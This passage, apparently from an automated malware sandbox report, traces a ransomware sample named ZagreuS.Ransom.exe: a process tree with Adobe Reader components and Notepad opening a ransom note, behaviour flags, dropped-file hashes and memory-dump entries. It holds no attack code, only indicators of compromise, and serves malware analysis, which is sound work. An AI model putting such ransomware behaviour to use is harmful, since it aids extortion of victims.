4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FD52362937FB0629E1BBFD50C1581C72 --renderer-client-id=8 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:33⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdfFilesize
519KB
MD5f628a245651b09f63d2f888761d99543
SHA1f004b9a7b6be37ba12d05167073cc2804b08ab64
SHA256de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6
SHA512842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exeFilesize
27KB
MD5961d5eab06ae737f0425824c5cdb92d9
SHA156c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA2564f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA51256c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txtFilesize
1KB
MD5c93df85b757185a4197e3a9543e2de63
SHA16f2fe4fe24a9909b274659ec3d36f5ddf760c2ab
SHA256f78e0256d3c310252d7a5bfaee6f5fe6bd0724b4d8df5a43645d015592162689
SHA512635134e04dc11834a87240abeaeee9802fe57cf1abc0f6ead1aa3540e9a3b615891cd02894341026e18a47a057b4bc4738af60638801b394287a69b5e3f43569
-
\??\pipe\LOCAL\crashpad_520_KWKWARCZMZUVBAKDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-136-0x0000000000000000-mapping.dmp
-
memory/272-162-0x0000000000000000-mapping.dmp
-
memory/376-141-0x0000000000000000-mapping.dmp
-
memory/396-144-0x0000000000000000-mapping.dmp
-
memory/520-142-0x0000000000000000-mapping.dmp
-
memory/1132-158-0x0000000000000000-mapping.dmp
-
memory/1284-176-0x0000000000000000-mapping.dmp
-
memory/1528-145-0x0000000000000000-mapping.dmp
-
memory/1612-150-0x0000000000000000-mapping.dmp
-
memory/2212-139-0x00007FF8D6ED0000-0x00007FF8D7991000-memory.dmpFilesize
10.8MB
-
memory/2212-133-0x0000000000520000-0x000000000052C000-memory.dmpFilesize
48KB
-
memory/2212-130-0x0000000000000000-mapping.dmp
-
memory/2792-135-0x0000000000000000-mapping.dmp
-
memory/3000-159-0x0000000000000000-mapping.dmp
-
memory/3416-178-0x0000000000000000-mapping.dmp
-
memory/3784-147-0x0000000000000000-mapping.dmp
-
memory/3828-137-0x0000000000000000-mapping.dmp
-
memory/3944-138-0x0000000000000000-mapping.dmp
-
memory/4016-183-0x0000000000000000-mapping.dmp
-
memory/4156-171-0x0000000000000000-mapping.dmp
-
memory/4340-140-0x0000000000000000-mapping.dmp
-
memory/4348-153-0x0000000000000000-mapping.dmp
-
memory/4352-148-0x0000000000000000-mapping.dmp
-
memory/4388-187-0x0000000000000000-mapping.dmp
-
memory/4420-146-0x0000000000000000-mapping.dmp
-
memory/4464-185-0x0000000000000000-mapping.dmp
-
memory/4624-164-0x0000000000000000-mapping.dmp
-
memory/4680-186-0x0000000000000000-mapping.dmp
-
memory/4972-174-0x0000000000000000-mapping.dmp
-
memory/5068-167-0x0000000000000000-mapping.dmp
-
memory/5072-134-0x0000000000000000-mapping.dmp
-
memory/5344-189-0x0000000000000000-mapping.dmp
-
memory/5360-190-0x0000000000000000-mapping.dmp
-
memory/5456-192-0x0000000000000000-mapping.dmp
-
memory/5596-194-0x0000000000000000-mapping.dmp